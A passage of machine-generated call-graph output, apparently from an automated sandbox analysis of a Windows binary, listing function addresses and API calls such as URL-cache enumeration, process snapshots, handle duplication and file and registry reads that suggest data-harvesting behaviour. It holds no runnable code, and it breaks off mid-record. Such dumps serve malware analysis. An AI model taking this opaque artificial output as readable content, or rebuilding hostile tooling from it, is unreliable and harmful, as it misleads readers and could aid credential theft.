wcscat 38104->38106 38105->38106 38106->38015 38127 44db70 38107->38127 38111 40dbfd 38130 4447d9 38111->38130 38114 40dc34 wcscpy wcscpy 38156 40d6f5 38114->38156 38115 40dc1f wcscpy 38115->38114 38118 40d6f5 3 API calls 38119 40dc73 38118->38119 38120 40d6f5 3 API calls 38119->38120 38121 40dc89 38120->38121 38122 40d6f5 3 API calls 38121->38122 38123 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38122->38123 38162 40da80 38123->38162 38126->38104 38128 40dbb4 memset memset 38127->38128 38129 409bca GetModuleFileNameW 38128->38129 38129->38111 38132 4447f4 38130->38132 38131 40dc1b 38131->38114 38131->38115 38132->38131 38133 444807 ??2@YAPAXI 38132->38133 38134 44481f 38133->38134 38135 444873 _snwprintf 38134->38135 38136 4448ab wcscpy 38134->38136 38169 44474a 8 API calls 38135->38169 38138 4448bb 38136->38138 38170 44474a 8 API calls 38138->38170 38139 4448a7 38139->38136 38139->38138 38141 4448cd 38171 44474a 8 API calls 38141->38171 38143 4448e2 38172 44474a 8 API calls 38143->38172 38145 4448f7 38173 44474a 8 API calls 38145->38173 38147 44490c 38174 44474a 8 API calls 38147->38174 38149 444921 38175 44474a 8 API calls 38149->38175 38151 444936 38176 44474a 8 API calls 38151->38176 38153 44494b 38177 44474a 8 API calls 38153->38177 38155 444960 ??3@YAXPAX 38155->38131 38157 44db70 38156->38157 38158 40d702 memset GetPrivateProfileStringW 38157->38158 38159 40d752 38158->38159 38160 40d75c WritePrivateProfileStringW 38158->38160 38159->38160 38161 40d758 38159->38161 38160->38161 38161->38118 38163 44db70 38162->38163 38164 40da8d memset 38163->38164 38165 40daac LoadStringW 38164->38165 38166 40dac6 38165->38166 38166->38165 38168 40dade 38166->38168 38178 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38166->38178 38168->37948 38169->38139 38170->38141 38171->38143 38172->38145 38173->38147 38174->38149 38175->38151 38176->38153 38177->38155 38178->38166 38189 409b98 GetFileAttributesW 38179->38189 38181 40daea 38182 40daef wcscpy wcscpy GetPrivateProfileIntW 38181->38182 38188 40db63 38181->38188 38190 40d65d GetPrivateProfileStringW 38182->38190 38184 40db3e 38191 40d65d GetPrivateProfileStringW 38184->38191 38186 40db4f 38192 40d65d GetPrivateProfileStringW 38186->38192 38188->37950 38189->38181 38190->38184 38191->38186 38192->38188 38229 40eaff 38193->38229 38197 411ae2 memset 38196->38197 38198 411b8f 38196->38198 38270 409bca GetModuleFileNameW 38197->38270 38210 411a8b 38198->38210 38200 411b0a wcsrchr 38201 411b22 wcscat 38200->38201 38202 411b1f 38200->38202 38271 414770 wcscpy wcscpy wcscpy CloseHandle 38201->38271 38202->38201 38204 411b67 38272 402afb 38204->38272 38208 411b7f 38328 40ea13 SendMessageW memset SendMessageW 38208->38328 38211 402afb 27 API calls 38210->38211 38212 411ac0 38211->38212 38213 4110dc 38212->38213 38214 41113e 38213->38214 38219 4110f0 38213->38219 38353 40969c LoadCursorW SetCursor 38214->38353 38216 411143 38227 40b04b ??3@YAXPAX 38216->38227 38354 444a54 38216->38354 38357 4032b4 38216->38357 38217 4110f7 _wcsicmp 38217->38219 38218 411157 38220 40ada2 _wcsicmp 38218->38220 38219->38214 38219->38217 38375 410c46 10 API calls 38219->38375 38223 411167 38220->38223 38221 4111af 38223->38221 38224 4111a6 qsort 38223->38224 38224->38221 38227->38218 38228->38027 38230 40eb10 38229->38230 38243 40e8e0 38230->38243 38233 40eb6c memcpy memcpy 38234 40ebe1 38233->38234 38235 40ebb7 38233->38235 38234->38233 38236 40ebf2 ??2@YAPAXI ??2@YAPAXI 38234->38236 38235->38234 38237 40d134 16 API calls 38235->38237 38238 40ec2e ??2@YAPAXI 38236->38238 38241 40ec65 38236->38241 38237->38235 38238->38241 38253 40ea7f 38241->38253 38242 402f49 38242->38027 38244 40e8f2 38243->38244 38245 40e8eb ??3@YAXPAX 38243->38245 38246 40e900 38244->38246 38247 40e8f9 ??3@YAXPAX 38244->38247 38245->38244 38248 40e911 38246->38248 38249 40e90a ??3@YAXPAX 38246->38249 38247->38246 38250 40e931 ??2@YAPAXI ??2@YAPAXI 38248->38250 38251 40e921 ??3@YAXPAX 38248->38251 38252 40e92a ??3@YAXPAX 38248->38252 38249->38248 38250->38233 38251->38252 38252->38250 38254 40aa04 free 38253->38254 38255 40ea88 38254->38255 38256 40aa04 free 38255->38256 38257 40ea90 38256->38257 38258 40aa04 free 38257->38258 38259 40ea98 38258->38259 38260 40aa04 free 38259->38260 38261 40eaa0 38260->38261 38262 40a9ce 4 API calls 38261->38262 38263 40eab3 38262->38263 38264 40a9ce 4 API calls 38263->38264 38265 40eabd 38264->38265 38266 40a9ce 4 API calls 38265->38266 38267 40eac7 38266->38267 38268 40a9ce 4 API calls 38267->38268 38269 40ead1 38268->38269 38269->38242 38270->38200 38271->38204 38329 40b2cc 38272->38329 38274 402b0a 38275 40b2cc 27 API calls 38274->38275 38276 402b23 38275->38276 38277 40b2cc 27 API calls 38276->38277 38278 402b3a 38277->38278 38279 40b2cc 27 API calls 38278->38279 38280 402b54 38279->38280 38281 40b2cc 27 API calls 38280->38281 38282 402b6b 38281->38282 38283 40b2cc 27 API calls 38282->38283 38284 402b82 38283->38284 38285 40b2cc 27 API calls 38284->38285 38286 402b99 38285->38286 38287 40b2cc 27 API calls 38286->38287 38288 402bb0 38287->38288 38289 40b2cc 27 API calls 38288->38289 38290 402bc7 38289->38290 38291 40b2cc 27 API calls 38290->38291 38292 402bde 38291->38292 38293 40b2cc 27 API calls 38292->38293 38294 402bf5 38293->38294 38295 40b2cc 27 API calls 38294->38295 38296 402c0c 38295->38296 38297 40b2cc 27 API calls 38296->38297 38298 402c23 38297->38298 38299 40b2cc 27 API calls 38298->38299 38300 402c3a 38299->38300 38301 40b2cc 27 API calls 38300->38301 38302 402c51 38301->38302 38303 40b2cc 27 API calls 38302->38303 38304 402c68 38303->38304 38305 40b2cc 27 API calls 38304->38305 38306 402c7f 38305->38306 38307 40b2cc 27 API calls 38306->38307 38308 402c99 38307->38308 38309 40b2cc 27 API calls 38308->38309 38310 402cb3 38309->38310 38311 40b2cc 27 API calls 38310->38311 38312 402cd5 38311->38312 38313 40b2cc 27 API calls 38312->38313 38314 402cf0 38313->38314 38315 40b2cc 27 API calls 38314->38315 38316 402d0b 38315->38316 38317 40b2cc 27 API calls 38316->38317 38318 402d26 38317->38318 38319 40b2cc 27 API calls 38318->38319 38320 402d3e 38319->38320 38321 40b2cc 27 API calls 38320->38321 38322 402d59 38321->38322 38323 40b2cc 27 API calls 38322->38323 38324 402d78 38323->38324 38325 40b2cc 27 API calls 38324->38325 38326 402d93 38325->38326 38327 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38326->38327 38327->38208 38328->38198 38332 40b58d 38329->38332 38331 40b2d1 38331->38274 38333 40b5a4 GetModuleHandleW FindResourceW 38332->38333 38334 40b62e 38332->38334 38335 40b5c2 LoadResource 38333->38335 38337 40b5e7 38333->38337 38334->38331 38336 40b5d0 SizeofResource LockResource 38335->38336 38335->38337 38336->38337 38337->38334 38345 40afcf 38337->38345 38339 40b608 memcpy 38348 40b4d3 memcpy 38339->38348 38341 40b61e 38349 40b3c1 18 API calls 38341->38349 38343 40b626 38350 40b04b 38343->38350 38346 40b04b ??3@YAXPAX 38345->38346 38347 40afd7 ??2@YAPAXI 38346->38347 38347->38339 38348->38341 38349->38343 38351 40b051 ??3@YAXPAX 38350->38351 38352 40b05f 38350->38352 38351->38352 38352->38334 38353->38216 38355 444a64 FreeLibrary 38354->38355 38356 444a83 38354->38356 38355->38356 38356->38218 38358 4032c4 38357->38358 38359 40b633 free 38358->38359 38360 403316 38359->38360 38376 44553b 38360->38376 38364 403480 38574 40368c 15 API calls 38364->38574 38366 403489 38367 40b633 free 38366->38367 38369 403495 38367->38369 38368 40333c 38368->38364 38370 4033a9 memset memcpy 38368->38370 38371 4033ec wcscmp 38368->38371 38572 4028e7 11 API calls 38368->38572 38573 40f508 6 API calls 38368->38573 38369->38218 38370->38368 38370->38371 38371->38368 38373 403421 _wcsicmp 38373->38368 38375->38219 38377 445548 38376->38377 38378 445599 38377->38378 38575 40c768 38377->38575 38379 4455a8 memset 38378->38379 38521 4457f2 38378->38521 38659 403988 38379->38659 38385 4455e5 38394 445672 38385->38394 38404 44560f 38385->38404 38387 4458bb memset memset 38391 414c2e 16 API calls 38387->38391 38389 4459ed 38395 445a00 memset memset 38389->38395 38396 445b22 38389->38396 38390 44595e memset memset 38397 414c2e 16 API calls 38390->38397 38398 4458f9 38391->38398 38392 44557a 38399 44558c 38392->38399 38639 4136c0 38392->38639 38670 403fbe memset memset memset memset memset 38394->38670 38401 414c2e 16 API calls 38395->38401 38406 445bca 38396->38406 38407 445b38 memset memset memset 38396->38407 38402 44599c 38397->38402 38403 40b2cc 27 API calls 38398->38403 38643 444b06 38399->38643 38411 445a3e 38401->38411 38413 40b2cc 27 API calls 38402->38413 38414 445909 38403->38414 38416 4087b3 335 API calls 38404->38416 38415 445c8b memset memset 38406->38415 38472 445cf0 38406->38472 38419 445bd4 38407->38419 38420 445b98 38407->38420 38408 445849 38853 40b1ab free free 38408->38853 38421 40b2cc 27 API calls 38411->38421 38429 4459ac 38413->38429 38425 409d1f 6 API calls 38414->38425 38430 414c2e 16 API calls 38415->38430 38426 445621 38416->38426 38418 44589f 38854 40b1ab free free 38418->38854 38808 414c2e 38419->38808 38420->38419 38432 445ba2 38420->38432 38434 445a4f 38421->38434 38424 403335 38571 4452e5 43 API calls 38424->38571 38440 445919 38425->38440 38839 4454bf 20 API calls 38426->38839 38427 445823 38427->38408 38449 4087b3 335 API calls 38427->38449 38428 445854 38435 4458aa 38428->38435 38785 403c9c memset memset memset memset memset 38428->38785 38441 409d1f 6 API calls 38429->38441 38442 445cc9 38430->38442 38944 4099c6 wcslen 38432->38944 38433 4456b2 38841 40b1ab free free 38433->38841 38446 409d1f 6 API calls 38434->38446 38435->38387 38468 44594a 38435->38468 38438 445d3d 38467 40b2cc 27 API calls 38438->38467 38439 445d88 memset memset memset 38450 414c2e 16 API calls 38439->38450 38855 409b98 GetFileAttributesW 38440->38855 38451 4459bc 38441->38451 38452 409d1f 6 API calls 38442->38452 38443 445879 38443->38418 38462 4087b3 335 API calls 38443->38462 38445 445680 38445->38433 38693 4087b3 memset 38445->38693 38455 445a63 38446->38455 38447 40b2cc 27 API calls 38456 445bf3 38447->38456 38449->38427 38459 445dde 38450->38459 38920 409b98 GetFileAttributesW 38451->38920 38461 445ce1 38452->38461 38453 445bb3 38947 445403 memset 38453->38947 38465 40b2cc 27 API calls 38455->38465 38824 409d1f wcslen wcslen 38456->38824 38457 445928 38457->38468 38856 40b6ef 38457->38856 38469 40b2cc 27 API calls 38459->38469 38964 409b98 GetFileAttributesW 38461->38964 38462->38443 38474 445a94 38465->38474 38477 445d54 _wcsicmp 38467->38477 38468->38389 38468->38390 38480 445def 38469->38480 38470 4459cb 38470->38389 38487 40b6ef 249 API calls 38470->38487 38472->38424 38472->38438 38472->38439 38473 445389 255 API calls 38473->38406 38921 40ae18 38474->38921 38475 44566d 38475->38521 38744 413d4c 38475->38744 38484 445d71 38477->38484 38548 445d67 38477->38548 38479 445665 38840 40b1ab free free 38479->38840 38485 409d1f 6 API calls 38480->38485 38965 445093 23 API calls 38484->38965 38492 445e03 38485->38492 38487->38389 38488 4456d8 38494 40b2cc 27 API calls 38488->38494 38491 44563c 38491->38479 38497 4087b3 335 API calls 38491->38497 38966 409b98 GetFileAttributesW 38492->38966 38493 40b6ef 249 API calls 38493->38424 38499 4456e2 38494->38499 38495 40b2cc 27 API calls 38500 445c23 38495->38500 38496 445d83 38496->38424 38497->38491 38842 413fa6 _wcsicmp _wcsicmp 38499->38842 38504 409d1f 6 API calls 38500->38504 38502 445e12 38508 445e6b 38502->38508 38515 40b2cc 27 API calls 38502->38515 38506 445c37 38504->38506 38505 4456eb 38511 4456fd memset memset memset memset 38505->38511 38512 4457ea 38505->38512 38513 445389 255 API calls 38506->38513 38507 445b17 38941 40aebe 38507->38941 38968 445093 23 API calls 38508->38968 38843 409c70 wcscpy wcsrchr 38511->38843 38846 413d29 38512->38846 38519 445c47 38513->38519 38520 445e33 38515->38520 38517 445e7e 38522 445f67 38517->38522 38525 40b2cc 27 API calls 38519->38525 38526 409d1f 6 API calls 38520->38526 38521->38428 38762 403e2d memset memset memset memset memset 38521->38762 38528 40b2cc 27 API calls 38522->38528 38523 445ab2 memset 38529 40b2cc 27 API calls 38523->38529 38531 445c53 38525->38531 38527 445e47 38526->38527 38967 409b98 GetFileAttributesW 38527->38967 38533 445f73 38528->38533 38534 445aa1 38529->38534 38530 409c70 2 API calls 38535 44577e 38530->38535 38536 409d1f 6 API calls 38531->38536 38538 409d1f 6 API calls 38533->38538 38534->38507 38534->38523 38539 409d1f 6 API calls 38534->38539 38547 445389 255 API calls 38534->38547 38928 40add4 38534->38928 38933 40ae51 38534->38933 38540 409c70 2 API calls 38535->38540 38541 445c67 38536->38541 38537 445e56 38537->38508 38545 445e83 memset 38537->38545 38542 445f87 38538->38542 38539->38534 38543 44578d 38540->38543 38544 445389 255 API calls 38541->38544 38971 409b98 GetFileAttributesW 38542->38971 38543->38512 38550 40b2cc 27 API calls 38543->38550 38544->38406 38549 40b2cc 27 API calls 38545->38549 38547->38534 38548->38424 38548->38493 38551 445eab 38549->38551 38552 4457a8 38550->38552 38553 409d1f 6 API calls 38551->38553 38554 409d1f 6 API calls 38552->38554 38555 445ebf 38553->38555 38556 4457b8 38554->38556 38557 40ae18 9 API calls 38555->38557 38845 409b98 GetFileAttributesW 38556->38845 38567 445ef5 38557->38567 38559 4457c7 38559->38512 38561 4087b3 335 API calls 38559->38561 38560 40ae51 9 API calls 38560->38567 38561->38512 38562 445f5c 38564 40aebe FindClose 38562->38564 38563 40add4 2 API calls 38563->38567 38564->38522 38565 40b2cc 27 API calls 38565->38567 38566 409d1f 6 API calls 38566->38567 38567->38560 38567->38562 38567->38563 38567->38565 38567->38566 38569 445f3a 38567->38569 38969 409b98 GetFileAttributesW 38567->38969 38970 445093 23 API calls 38569->38970 38571->38368 38572->38373 38573->38368 38574->38366 38576 40c775 38575->38576 38972 40b1ab free free 38576->38972 38578 40c788 38973 40b1ab free free 38578->38973 38580 40c790 38974 40b1ab free free 38580->38974 38582 40c798 38583 40aa04 free 38582->38583 38584 40c7a0 38583->38584 38975 40c274 memset 38584->38975 38589 40a8ab 9 API calls 38590 40c7c3 38589->38590 38591 40a8ab 9 API calls 38590->38591 38592 40c7d0 38591->38592 39004 40c3c3 38592->39004 38596 40c877 38605 40bdb0 38596->38605 38597 40c86c 39032 4053fe 37 API calls 38597->39032 38600 40c813 _wcslwr 39030 40c634 47 API calls 38600->39030 38602 40c829 wcslen 38603 40c7e5 38602->38603 38603->38596 38603->38597 39029 40a706 wcslen memcpy 38603->39029 39031 40c634 47 API calls 38603->39031 39166 404363 38605->39166 38610 40b2cc 27 API calls 38611 40be02 wcslen 38610->38611 38612 40bf5d 38611->38612 38620 40be1e 38611->38620 39183 40440c 38612->39183 38613 40be26 wcsncmp 38613->38620 38616 40be7d memset 38617 40bea7 memcpy 38616->38617 38616->38620 38618 40bf11 wcschr 38617->38618 38617->38620 38618->38620 38619 40b2cc 27 API calls 38621 40bef6 _wcsnicmp 38619->38621 38620->38612 38620->38613 38620->38616 38620->38617 38620->38618 38620->38619 38622 40bf43 LocalFree 38620->38622 39186 40bd5d 28 API calls 38620->39186 39187 404423 38620->39187 38621->38618 38621->38620 38622->38620 38623 4135f7 39199 4135e0 38623->39199 38626 40b2cc 27 API calls 38627 41360d 38626->38627 38628 40a804 8 API calls 38627->38628 38629 413613 38628->38629 38630 41363e 38629->38630 38632 40b273 27 API calls 38629->38632 38631 4135e0 FreeLibrary 38630->38631 38633 413643 38631->38633 38634 413625 38632->38634 38633->38392 38634->38630 38635 413648 38634->38635 38636 413658 38635->38636 38637 4135e0 FreeLibrary 38635->38637 38636->38392 38638 413666 38637->38638 38638->38392 38641 4136e2 38639->38641 38640 413827 38838 41366b FreeLibrary 38640->38838 38641->38640 38642 4137ac CoTaskMemFree 38641->38642 38642->38641 39202 4449b9 38643->39202 38646 444c1f 38646->38378 38647 4449b9 35 API calls 38649 444b4b 38647->38649 38648 444c15 38651 4449b9 35 API calls 38648->38651 38649->38648 39222 444972 GetVersionExW 38649->39222 38651->38646 38652 444b8c 38653 444b99 memcmp 38652->38653 38654 444c0b 38652->38654 39223 444aa5 35 API calls 38652->39223 39224 40a7a0 GetVersionExW 38652->39224 39225 444a85 35 API calls 38652->39225 38653->38652 39226 444a85 35 API calls 38654->39226 38660 40399d 38659->38660 39227 403a16 38660->39227 38662 403a09 39241 40b1ab free free 38662->39241 38664 403a12 wcsrchr 38664->38385 38665 4039a3 38665->38662 38668 4039f4 38665->38668 39238 40a02c CreateFileW 38665->39238 38668->38662 38669 4099c6 2 API calls 38668->38669 38669->38662 38671 414c2e 16 API calls 38670->38671 38672 404048 38671->38672 38673 414c2e 16 API calls 38672->38673 38674 404056 38673->38674 38675 409d1f 6 API calls 38674->38675 38676 404073 38675->38676 38677 409d1f 6 API calls 38676->38677 38678 40408e 38677->38678 38679 409d1f 6 API calls 38678->38679 38680 4040a6 38679->38680 38681 403af5 20 API calls 38680->38681 38682 4040ba 38681->38682 38683 403af5 20 API calls 38682->38683 38684 4040cb 38683->38684 39268 40414f memset 38684->39268 38686 404140 39282 40b1ab free free 38686->39282 38688 4040ec memset 38691 4040e0 38688->38691 38689 404148 38689->38445 38690 4099c6 2 API calls 38690->38691 38691->38686 38691->38688 38691->38690 38692 40a8ab 9 API calls 38691->38692 38692->38691 39295 40a6e6 WideCharToMultiByte 38693->39295 38695 4087ed 39296 4095d9 memset 38695->39296 38698 408809 memset memset memset memset memset 38699 40b2cc 27 API calls 38698->38699 38700 4088a1 38699->38700 38701 409d1f 6 API calls 38700->38701 38702 4088b1 38701->38702 38703 40b2cc 27 API calls 38702->38703 38704 4088c0 38703->38704 38705 409d1f 6 API calls 38704->38705 38706 4088d0 38705->38706 38707 40b2cc 27 API calls 38706->38707 38708 4088df 38707->38708 38709 409d1f 6 API calls 38708->38709 38710 4088ef 38709->38710 38711 40b2cc 27 API calls 38710->38711 38712 4088fe 38711->38712 38730 408953 38730->38445 38745 40b633 free 38744->38745 38746 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38745->38746 38747 413f00 Process32NextW 38746->38747 38748 413da5 OpenProcess 38747->38748 38749 413f17 CloseHandle 38747->38749 38750 413df3 memset 38748->38750 38753 413eb0 38748->38753 38749->38488 39345 413f27 38750->39345 38752 413ebf free 38752->38753 38753->38747 38753->38752 38754 4099f4 3 API calls 38753->38754 38754->38753 38755 413e37 GetModuleHandleW 38757 413e46 38755->38757 38759 413e1f 38755->38759 38757->38759 38758 413e6a QueryFullProcessImageNameW 38758->38759 38759->38755 38759->38758 39350 413959 38759->39350 39366 413ca4 38759->39366 38761 413ea2 CloseHandle 38761->38753 38763 414c2e 16 API calls 38762->38763 38764 403eb7 38763->38764 38765 414c2e 16 API calls 38764->38765 38766 403ec5 38765->38766 38767 409d1f 6 API calls 38766->38767 38768 403ee2 38767->38768 38769 409d1f 6 API calls 38768->38769 38770 403efd 38769->38770 38771 409d1f 6 API calls 38770->38771 38772 403f15 38771->38772 38773 403af5 20 API calls 38772->38773 38774 403f29 38773->38774 38775 403af5 20 API calls 38774->38775 38776 403f3a 38775->38776 38777 40414f 33 API calls 38776->38777 38783 403f4f 38777->38783 38778 403faf 39379 40b1ab free free 38778->39379 38779 403f5b memset 38779->38783 38781 403fb7 38781->38427 38782 4099c6 2 API calls 38782->38783 38783->38778 38783->38779 38783->38782 38784 40a8ab 9 API calls 38783->38784 38784->38783 38786 414c2e 16 API calls 38785->38786 38787 403d26 38786->38787 38788 414c2e 16 API calls 38787->38788 38789 403d34 38788->38789 38790 409d1f 6 API calls 38789->38790 38791 403d51 38790->38791 38792 409d1f 6 API calls 38791->38792 38793 403d6c 38792->38793 38794 409d1f 6 API calls 38793->38794 38795 403d84 38794->38795 38796 403af5 20 API calls 38795->38796 38797 403d98 38796->38797 38798 403af5 20 API calls 38797->38798 38799 403da9 38798->38799 38800 40414f 33 API calls 38799->38800 38806 403dbe 38800->38806 38801 403e1e 39380 40b1ab free free 38801->39380 38802 403dca memset 38802->38806 38804 403e26 38804->38443 38805 4099c6 2 API calls 38805->38806 38806->38801 38806->38802 38806->38805 38807 40a8ab 9 API calls 38806->38807 38807->38806 38809 414b81 8 API calls 38808->38809 38810 414c40 38809->38810 38811 414c73 memset 38810->38811 39381 409cea 38810->39381 38813 414c94 38811->38813 39384 414592 RegOpenKeyExW 38813->39384 38815 414c64 SHGetSpecialFolderPathW 38817 414d0b 38815->38817 38817->38447 38818 414cc1 38819 414cf4 wcscpy 38818->38819 39385 414bb0 wcscpy 38818->39385 38819->38817 38821 414cd2 39386 4145ac RegQueryValueExW 38821->39386 38823 414ce9 RegCloseKey 38823->38819 38825 409d62 38824->38825 38826 409d43 wcscpy 38824->38826 38829 445389 38825->38829 38827 409719 2 API calls 38826->38827 38828 409d51 wcscat 38827->38828 38828->38825 38830 40ae18 9 API calls 38829->38830 38835 4453c4 38830->38835 38831 40ae51 9 API calls 38831->38835 38832 4453f3 38834 40aebe FindClose 38832->38834 38833 40add4 2 API calls 38833->38835 38836 4453fe 38834->38836 38835->38831 38835->38832 38835->38833 38837 445403 250 API calls 38835->38837 38836->38495 38837->38835 38838->38399 38839->38491 38840->38475 38841->38475 38842->38505 38844 409c89 38843->38844 38844->38530 38845->38559 38847 413d39 38846->38847 38848 413d2f FreeLibrary 38846->38848 38849 40b633 free 38847->38849 38848->38847 38850 413d42 38849->38850 38851 40b633 free 38850->38851 38852 413d4a 38851->38852 38852->38521 38853->38428 38854->38435 38855->38457 38857 44db70 38856->38857 38858 40b6fc memset 38857->38858 38859 409c70 2 API calls 38858->38859 38860 40b732 wcsrchr 38859->38860 38861 40b743 38860->38861 38862 40b746 memset 38860->38862 38861->38862 38863 40b2cc 27 API calls 38862->38863 38864 40b76f 38863->38864 38865 409d1f 6 API calls 38864->38865 38866 40b783 38865->38866 39387 409b98 GetFileAttributesW 38866->39387 38868 40b792 38870 409c70 2 API calls 38868->38870 38882 40b7c2 38868->38882 38872 40b7a5 38870->38872 38875 40b2cc 27 API calls 38872->38875 38873 40b837 CloseHandle 38877 40b83e memset 38873->38877 38874 40b817 39491 409a45 GetTempPathW 38874->39491 38878 40b7b2 38875->38878 39421 40a6e6 WideCharToMultiByte 38877->39421 38879 409d1f 6 API calls 38878->38879 38879->38882 38880 40b827 38880->38877 39388 40bb98 38882->39388 38883 40b866 39422 444432 38883->39422 38886 40bad5 38889 40b04b ??3@YAXPAX 38886->38889 38887 40b273 27 API calls 38888 40b89a 38887->38888 39468 438552 38888->39468 38891 40baf3 38889->38891 38891->38468 38893 40bacd 39471 443d90 38893->39471 38896 40bac6 39521 424f26 122 API calls 38896->39521 38897 40b8bd memset 39512 425413 17 API calls 38897->39512 38900 425413 17 API calls 38918 40b8b8 38900->38918 38903 40a71b MultiByteToWideChar 38903->38918 38904 40a734 MultiByteToWideChar 38904->38918 38907 40b9b5 memcmp 38907->38918 38908 4099c6 2 API calls 38908->38918 38909 404423 37 API calls 38909->38918 38912 4251c4 136 API calls 38912->38918 38913 40bb3e memset memcpy 39522 40a734 MultiByteToWideChar 38913->39522 38915 40bb88 LocalFree 38915->38918 38918->38896 38918->38897 38918->38900 38918->38903 38918->38904 38918->38907 38918->38908 38918->38909 38918->38912 38918->38913 38919 40ba5f memcmp 38918->38919 39513 4253ef 16 API calls 38918->39513 39514 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38918->39514 39515 4253af 17 API calls 38918->39515 39516 4253cf 17 API calls 38918->39516 39517 447280 memset 38918->39517 39518 447960 memset memcpy memcpy memcpy 38918->39518 39519 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38918->39519 39520 447920 memcpy memcpy memcpy 38918->39520 38919->38918 38920->38470 38922 40aebe FindClose 38921->38922 38923 40ae21 38922->38923 38924 4099c6 2 API calls 38923->38924 38925 40ae35 38924->38925 38926 409d1f 6 API calls 38925->38926 38927 40ae49 38926->38927 38927->38534 38929 40ade0 38928->38929 38932 40ae0f 38928->38932 38930 40ade7 wcscmp 38929->38930 38929->38932 38931 40adfe wcscmp 38930->38931 38930->38932 38931->38932 38932->38534 38934 40ae7b FindNextFileW 38933->38934 38935 40ae5c FindFirstFileW 38933->38935 38936 40ae94 38934->38936 38937 40ae8f 38934->38937 38935->38936 38939 40aeb6 38936->38939 38940 409d1f 6 API calls 38936->38940 38938 40aebe FindClose 38937->38938 38938->38936 38939->38534 38940->38939 38942 40aed1 38941->38942 38943 40aec7 FindClose 38941->38943 38942->38396 38943->38942 38945 4099d7 38944->38945 38946 4099da memcpy 38944->38946 38945->38946 38946->38453 38948 40b2cc 27 API calls 38947->38948 38949 44543f 38948->38949 38950 409d1f 6 API calls 38949->38950 38951 44544f 38950->38951 39905 409b98 GetFileAttributesW 38951->39905 38953 44545e 38954 445476 38953->38954 38955 40b6ef 249 API calls 38953->38955 38956 40b2cc 27 API calls 38954->38956 38955->38954 38957 445482 38956->38957 38958 409d1f 6 API calls 38957->38958 38959 445492 38958->38959 39906 409b98 GetFileAttributesW 38959->39906 38961 4454a1 38962 4454b9 38961->38962 38963 40b6ef 249 API calls 38961->38963 38962->38473 38963->38962 38964->38472 38965->38496 38966->38502 38967->38537 38968->38517 38969->38567 38970->38567 38971->38548 38972->38578 38973->38580 38974->38582 38976 414c2e 16 API calls 38975->38976 38977 40c2ae 38976->38977 39033 40c1d3 38977->39033 38982 40c3be 38999 40a8ab 38982->38999 38983 40afcf 2 API calls 38984 40c2fd FindFirstUrlCacheEntryW 38983->38984 38985 40c3b6 38984->38985 38986 40c31e wcschr 38984->38986 38987 40b04b ??3@YAXPAX 38985->38987 38988 40c331 38986->38988 38989 40c35e FindNextUrlCacheEntryW 38986->38989 38987->38982 38991 40a8ab 9 API calls 38988->38991 38989->38986 38990 40c373 GetLastError 38989->38990 38992 40c3ad FindCloseUrlCache 38990->38992 38993 40c37e 38990->38993 38994 40c33e wcschr 38991->38994 38992->38985 38995 40afcf 2 API calls 38993->38995 38994->38989 38996 40c34f 38994->38996 38997 40c391 FindNextUrlCacheEntryW 38995->38997 38998 40a8ab 9 API calls 38996->38998 38997->38986 38997->38992 38998->38989 39127 40a97a 38999->39127 39002 40a8cc 39002->38589 39003 40a8d0 7 API calls 39003->39002 39132 40b1ab free free 39004->39132 39006 40c3dd 39007 40b2cc 27 API calls 39006->39007 39008 40c3e7 39007->39008 39133 414592 RegOpenKeyExW 39008->39133 39010 40c3f4 39011 40c50e 39010->39011 39012 40c3ff 39010->39012 39026 405337 39011->39026 39013 40a9ce 4 API calls 39012->39013 39014 40c418 memset 39013->39014 39134 40aa1d 39014->39134 39017 40c471 39019 40c47a _wcsupr 39017->39019 39018 40c505 RegCloseKey 39018->39011 39020 40a8d0 7 API calls 39019->39020 39021 40c498 39020->39021 39022 40a8d0 7 API calls 39021->39022 39023 40c4ac memset 39022->39023 39024 40aa1d 39023->39024 39025 40c4e4 RegEnumValueW 39024->39025 39025->39018 39025->39019 39136 405220 39026->39136 39028 405340 39028->38603 39029->38600 39030->38602 39031->38603 39032->38596 39034 40ae18 9 API calls 39033->39034 39040 40c210 39034->39040 39035 40ae51 9 API calls 39035->39040 39036 40c264 39037 40aebe FindClose 39036->39037 39039 40c26f 39037->39039 39038 40add4 2 API calls 39038->39040 39045 40e5ed memset memset 39039->39045 39040->39035 39040->39036 39040->39038 39041 40c231 _wcsicmp 39040->39041 39042 40c1d3 34 API calls 39040->39042 39041->39040 39043 40c248 39041->39043 39042->39040 39058 40c084 21 API calls 39043->39058 39046 414c2e 16 API calls 39045->39046 39047 40e63f 39046->39047 39048 409d1f 6 API calls 39047->39048 39049 40e658 39048->39049 39059 409b98 GetFileAttributesW 39049->39059 39051 40e667 39052 409d1f 6 API calls 39051->39052 39054 40e680 39051->39054 39052->39054 39060 409b98 GetFileAttributesW 39054->39060 39055 40e68f 39056 40c2d8 39055->39056 39061 40e4b2 39055->39061 39056->38982 39056->38983 39058->39040 39059->39051 39060->39055 39082 40e01e 39061->39082 39063 40e593 39064 40e5b0 39063->39064 39065 40e59c DeleteFileW 39063->39065 39066 40b04b ??3@YAXPAX 39064->39066 39065->39064 39068 40e5bb 39066->39068 39067 40e521 39067->39063 39105 40e175 39067->39105 39070 40e5c4 CloseHandle 39068->39070 39071 40e5cc 39068->39071 39070->39071 39073 40b633 free 39071->39073 39072 40e573 39074 40e584 39072->39074 39075 40e57c CloseHandle 39072->39075 39076 40e5db 39073->39076 39126 40b1ab free free 39074->39126 39075->39074 39077 40b633 free 39076->39077 39079 40e5e3 39077->39079 39079->39056 39081 40e540 39081->39072 39125 40e2ab 30 API calls 39081->39125 39083 406214 22 API calls 39082->39083 39084 40e03c 39083->39084 39085 40e16b 39084->39085 39086 40dd85 60 API calls 39084->39086 39085->39067 39087 40e06b 39086->39087 39087->39085 39088 40afcf ??2@YAPAXI ??3@YAXPAX 39087->39088 39089 40e08d OpenProcess 39088->39089 39090 40e0a4 GetCurrentProcess DuplicateHandle 39089->39090 39094 40e152 39089->39094 39091 40e0d0 GetFileSize 39090->39091 39092 40e14a CloseHandle 39090->39092 39095 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39091->39095 39092->39094 39093 40e160 39097 40b04b ??3@YAXPAX 39093->39097 39094->39093 39096 406214 22 API calls 39094->39096 39098 40e0ea 